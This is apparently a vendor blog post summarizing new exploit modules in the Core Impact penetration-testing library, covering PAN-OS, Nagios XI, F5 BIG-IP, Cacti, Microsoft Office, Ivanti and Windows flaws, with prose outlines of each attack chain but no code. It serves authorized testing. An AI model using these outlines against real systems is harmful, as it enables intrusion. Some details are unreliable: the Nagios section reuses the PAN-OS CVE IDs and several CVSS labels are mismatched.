Core Impact Monthly Chronicle: Exploits and Updates | December 2024-January 2025

Core Impact Exploit Library Additions

One of Core Impact’s most valuable features is its certified exploit library, maintained by a team (formerly Core Labs) within the Fortra Intelligence & Research Experts (FIRE) group. This team conducts in-depth research to evaluate and prioritize the most critical vulnerabilities, ensuring the library is updated with high-impact, reliable exploits that enable pen testers to use the same techniques as modern real-world threats.

In 2024 alone, the team added 85 new exploits and 13 updates, showcasing their productivity and expertise. These exploits cover a wide range of vulnerability types and platforms, providing a breadth of coverage for penetration testing scenarios.

2024 Exploit Library Highlights

Types of Exploits
  • Remote Code Execution (RCE)       
  • Local Privilege Escalation
  • Denial of Service (DoS)
  • Information Disclosure
  • Client-Side Exploits
  • Authentication Bypass
  • Directory Traversal
  • SQL Injection
  • File Upload/Overwrite
  • Cross-Site Scripting (XSS)
  • Other

CVSS Ratings
  • Critical: 28
  • High: 39
  • Medium: 10
Platforms Targeted
  • Windows
  • Linux
  • Cross-Platform (Windows & Linux)
  • SCADA
  • IBM i
  • Web Applications
  • Network devices

CVEs Referenced
  • Total CVEs Referenced: 77
  • NOCVEs: 8

CVEs by Year:
  • 2024:  59
  • 2023:  13
  • 2022 and Earlier: 5 

This data underscores the team’s commitment to providing actionable exploits that address vulnerabilities across diverse environments. We look forward to bringing you more exploits throughout 2025!

While you can keep track of new releases through our exploit mailing list, here is a more detailed summary of some of the most recent additions to the library.

Exploits From December 2024 - January 2025


CVE-2024-9474, CVE-2024-0012 - Palo Alto Networks OS (PAN-OS) Remote Code Execution Exploit

Authors: Lucas Dominikow and Nahuel Gonzalez (QA)

CVSS:  7.2 MEDIUM 9.8 CRITICAL 

Reference: CVE-2024-9474, CVE-2024-0012

Key Vulnerability Details

  • CVE-2024-9474 – A privilege escalation vulnerability that allows authenticated attackers to execute commands with root privileges
  • CVE-2024-0012 – An authentication bypass vulnerability that enables unauthenticated attackers to perform administrator actions
  • When chained together, can lead to remote code execution 
  • Affects multiple versions of PAN-OS
  • Classified as Improper Neutralization of Special Elements used in an OS Command (CWE-78) and Missing Authentication for Critical Function (CWE-306)

Exploitation Impact and Mitigation

  • Attackers can gain a foothold using CVE-2024-9474, then use CVE-2024-0012 to perform administrative actions
  • Can lead to full system compromise
  • Patches have been released for both vulnerabilities in PAN-OS 11.2.4-h1, PAN-OS 11.1.5-h1, PAN-OS 11.0.6-h1, PAN-OS 10.2.12-h2, and PAN-OS 10.1.14-h6

Attacks in the Wild 

Exploitation Mechanism

  1. The exploit module sends a request containing a header parameter for authentication bypass (CVE-2024-0012) to inject a command within a "user" request body parameter (CVE-2024-9474).
  2. An elevated user session ID is sent in the response and the injected command is written to a local session cache file.
  3. A request is sent with the elevated session ID to trigger evaluation of the injected local session cache file.
  4. The process is repeated with all the necessary commands to deploy an agent.

Update

  • This update improves the module description and messages in the Module Output panel.

CVE-2024-24401, CVE-2024-24402- Nagios XI monitoringwizard SQL Injection Vulnerability Exploit

Authors: Fernando Páez Barceló and Nahuel Gonzalez (QA)

CVSS 9.8 CRITICAL 9.8 CRITICAL

ReferenceCVE-2024-24401CVE-2024-24402

Key Vulnerability Details

  • CVE-2024-24401 – A SQL Injection vulnerability that allows remote attackers to execute commands through crafted payloads
  • CVE-2024-24402 – A privilege escalation vulnerability that allows remote attackers to escalate privileges through crafted scripts
  • When chained together, can lead to remote code execution  
  • Affects Nagios XI version 2024R1.01
  • Classified as Improper Neutralization of Special Elements used in an SQL Query (CWE-89)  

Exploitation Impact and Mitigation

  • Attackers can gain a foothold using CVE-2024-9474, then use CVE-2024-0012 to perform administrative actions
  • Can lead to access to sensitive data and potential full system compromise
  • Patches have been released for both vulnerabilities in Nagios XI 2024R1.0.2

Attacks in the Wild 

  • No major attacks have been reported at this time

Exploitation Mechanism

  1. The exploit module for CVE-2024-24401 sends a crafted SQL injection payload to the monitoringwizard.php component.
  2. Once the SQL injection is successful, command execution within the web application is possible through the compromised database connection.
  3. The exploit module for CVE-2024-24402 leverages this initial access to deploy specially crafted script targeting the /usr/local/nagios/bin/npcd component in order to elevate privileges
  4. With this privilege escalation, pen testers can then execute system-level commands, establish persistence, and maintain access.

CVE-2024-26026- F5 BIG-IP Next Central Manager SQL Injection Vulnerability Exploit

Authors: Marcos Accossatto and Nahuel Gonzalez (QA)

CVSS:  9.8 CRITICAL

ReferenceCVE-2024-26026

Key Vulnerability Details

  • An SQL injection vulnerability exists in F5 BIG-IP Next Central Manager that enables an unauthenticated attacker to execute malicious SQL statements through the BIG-IP Next Central Manager API
  • Versions 20.0.1 - 20.1.0 of BIG-IP Next have been impacted 
  • Classified as Improper Neutralization of Special Elements in Output Used by a Downstream Component (CWE-89) and Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)

Exploitation Impact and Mitigation

  • Successful exploitation would provide access to sensitive information, including password hashes and the administrator password hash
  • This could eventually lead to password cracking, data breaches, and possibly full control of a compromised system  
  • A patch has been implemented into version 20.0 and beyond

Attacks in the Wild 

  • No major attacks have been reported at this time

Exploitation Mechanism

  1. The exploit module assembles a malicious HTTP POST request which contains a crafted SQL payload.

  2. Next, the exploit will be sent to the BIG-IP Next Central Manager endpoint and injected into the filter parameter.

  3. Once injected, the SQL query retrieves username and password hash pairs from the users table.

  4. From there, operators can *** the extracted passwords, allowing them to bypass authentication and gain access to the system.

CVE-2024-29895- Cacti Cmd Realtime Remote Code Execution Exploit 

Authors: Lucas Dominikow and Nahuel Gonzalez (QA)

CVSS:  10.0 CRITICAL 

ReferenceCVE-2024-29895 

Key Vulnerability Details

  • A command injection vulnerability that allows any unauthenticated user to execute arbitrary commands on the server when the "register_argc_argv" option of PHP is On
  • Development version 1.3.x has have been impacted 
  • Classified as Improper Neutralization of Special Elements used in a Command ('Command Injection') (CWE-77)  

Exploitation Impact and Mitigation

  • Successful exploitation would give attacker remote code execution
  • This could eventually lead to data breaches, malware deployment, and potentially complete server compromise 
  • As this vulnerability impacted a development version of Cacti, a patch was committed 
  • The patch was later reverted, so the vulnerability is still in place
  • A temporary workaround is to disable register_argc_argv PHP configuration option, which will prevent the vulnerability from being exploited

Attacks in the Wild 

  • No major attacks have been reported at this time

Exploitation Mechanism

  1. Once an operator confirms that the PHP configuration option is enabled, the exploit module will craft a malicious HTTP GET request. 

  2. The request is then injected into the cmd_realtime.php file on the Cacti server. 

  3. The special request sets $_SERVER['argv'] to contain an OS command through URL manipulation.

  4. From there, arbitrary commands can be executed to continue the engagement. 

CVE-2024-38200- Microsoft Office Spoofing NTLMv2 Disclosure Vulnerability Exploit

Authors: Esteban Kazimirow and Nahuel Gonzalez (QA)

CVSS:  9.1 CRITICAL 

Reference: CVE-2024-38200

Key Vulnerability Details

  • When a targeted user opens a malicious document, clicks a link, or visits a malicious website, this spoofing vulnerability allows attackers to capture NTLMv2 hashes 
  • Can be remotely exploited without special privileges 
  • Impacted versions include both 32-bit edition and 64-bit editions of Microsoft Office 2016, Microsoft Office LTSC 2021, Microsoft Office 2019, and Microsoft 365 Apps for Enterprise
  • Classified as Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)  

Exploitation Impact and Mitigation

  • Successful exploitation enables attackers to use NTLMv2 hashes in relay attacks to gain unauthorized access to other systems. 
  • This could lead to credential theft, data breaches, and potentially compromise other systems. 
  • Microsoft released a patch for this vulnerability in an August security update

Attacks in the Wild 

  • No major attacks have been reported at this time

Exploitation Mechanism

  1. This exploit module sends an email with a specially crafted link that points to an HTTP server.

  2. When the target opens it in a browser, Office will automatically attempt authentication.

  3. If the user is on the trusted list, it connects to the tester-controlled HTTP server so the operator and obtain the ntlm hashes.

  4. This exploit module does not require installing an agent, as it manages to obtain the NTLM hash of a legitimate user, allowing the engagement to continue with minimal chance of detection.

SMB Pool Overflow EternalRomance Exploit Update

Authors: Alexis Balbachan and Daniel De Luca (QA)

Update

This update adapts the EternalRomance exploit to be compatible with the latest Impacket version.

 

CVE-2025-0282- Ivanti Connect Secure IFT_PREAUTH_INIT clientCapabilities Buffer Overflow Remote Code Execution Exploit 

Authors: Marcos Accossatto and Daniel De Luca (QA)

CVSS:  9.0 CRITICAL

Reference: CVE-2025-0282

Key Vulnerability Details 

  • A stack-based buffer overflow vulnerability that allows unauthenticated remote attackers to execute arbitrary code

  • A flaw exists in the IFT_PREAUTH_INIT component, causing improper handling of client capabilities during the pre-authentication phase
  • Multiple versions of Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA gateways are impacted
  • Classified as Out-of-bounds Write (CWE-787) and Stack-based Buffer Overflow (CWE-121)  

Exploitation Impact and Mitigation

  • Successful exploitation enables unauthenticated remote attackers to fully compromise the Ivanti Connect Secure appliance
  • This could potentially lead to data breaches, malware deployment, network disruption, and complete system takeover
  • Ivanti released a patch for this vulnerability in an January security update

Attacks in the Wild  

Exploitation Mechanism

  1. This exploit module will first confirm that the target is an Ivanti Connect Secure appliance by analyzing its response characteristics or fingerprinting the service.

  2. The module will retrieve the appliance’s version number to verify if it is vulnerable to the specific exploit. 

  3. The module will then try to leak the base address of the libdsplibs.so library by registering a random endpoint in the local webserver.

  4. The module will exploit the vulnerability by brute-forcing the base address of the libdsplibs.so library, iteratively testing candidate addresses within a calculated range until the correct one is found. 

  5. For each candidate, it will craft a payload and attempt to execute a cURL command to the registered random endpoint,

  6. Once the base address of the libdsplibs.so library is obtained, the vulnerability will be used one more time to deploy an agent.

CVE-2024-38193- Microsoft Windows Ancillary Function Driver UAF Privilege Excalation Exploit 

Authors: Esteban Kazimirow and Arthur Lallemant (QA)

CVSS:  7.8 MEDIUM

ReferenceCVE-2024-38193

Key Vulnerability Details 

  • A race-condition vulnerability in the Windows Ancillary Function Driver for WinSock allows attackers to escalate privileges on affected systems.

  • A flaw exists in the Afd.sys module that improperly handles a temporary reference counter increment during buffer management
  • Multiple versions of Windows 10, Windows 11, and Windows Server are impacted
  • Classified as Use After Free (CWE-416)  

Exploitation Impact and Mitigation

  • Successful exploitation enables attackers to bypass standard access controls, granting them access to sensitive system areas
  • This could potentially lead to data breaches, malware deployment, network disruption, and complete system takeover 
  • Microsoft released a patch for this vulnerability in a security update in August 2024

Attacks in the Wild  

Exploitation Mechanism

  1. The exploit module corrupts kernel structures to trigger the vulnerability.
  2. Leveraging the corrupted structures, the exploit will gain arbitrary read/write primitives in kernel memory.
  3. The module will then steal a system token from another process to escalate privileges to SYSTEM level
  4. To avoid detection and ensure stability, the exploit repairs the corrupted kernel structures, restoring the system to a seemingly normal state.
  5. The module will lastly spawn a new agent process running with SYSTEM privileges. 
     
Related Products
Core Impact
Related Content

Learn more about Core Impact

WATCH DEMO